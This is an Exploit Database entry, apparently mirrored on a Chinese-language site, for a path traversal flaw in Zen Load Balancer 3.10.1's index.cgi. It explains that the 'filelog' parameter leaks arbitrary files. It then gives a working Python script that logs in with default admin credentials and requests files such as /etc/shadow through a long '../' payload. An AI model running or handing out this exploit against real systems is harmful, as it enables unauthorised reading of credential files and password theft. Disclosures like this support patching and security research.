Zen Load Balancer 3.10.1 – ‘index.cgi’ Directory Traversal

• Exploit Database
• 18 阅读

• 作者： Basim Alabdullah
  日期： 2020-04-10
• 类别：

  • webapps
  平台：

  • cgi
• 来源：https://www.exploit-db.com/exploits/48308/

• # Exploit Title: Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal
  # Date: 2020-04-10
  # Exploit Author: Basim Alabdullah
  # Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
  # Version: 3.10.1
  # Tested on: Debian8u2
  #
  # Technical Details:
  # The filelog parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.
  # The payload ../../../../../../../../../../../../../../../../etc/shadow was submitted in the filelog parameter. The requested file was returned in the application's response.
  # Note that disclosure of the shadow file may allow an attacker to discover users' passwords
  #
  # Impact:
  # --------
  # Successful exploitation could allow an attacker to obtain sensitive
  # information.
  
  import requests
  import sys
  
  if len(sys.argv) <2:
  print("Example Use: python exploit.py https://192.168.1.1:444 /etc/shadow")
  sys.exit(-1)
  else:
  files=sys.argv[2]
  url=sys.argv[1]
  with requests.session() as s:
  urlz=url+"/index.cgi?id=2-3&filelog=../../../../../../../../../../../../../../../../"+files+"&nlines=100&action=See+logs"
  response = s.get(urlz, auth=('admin', 'admin'), verify=False)
  txt=response.text
  print(response.text)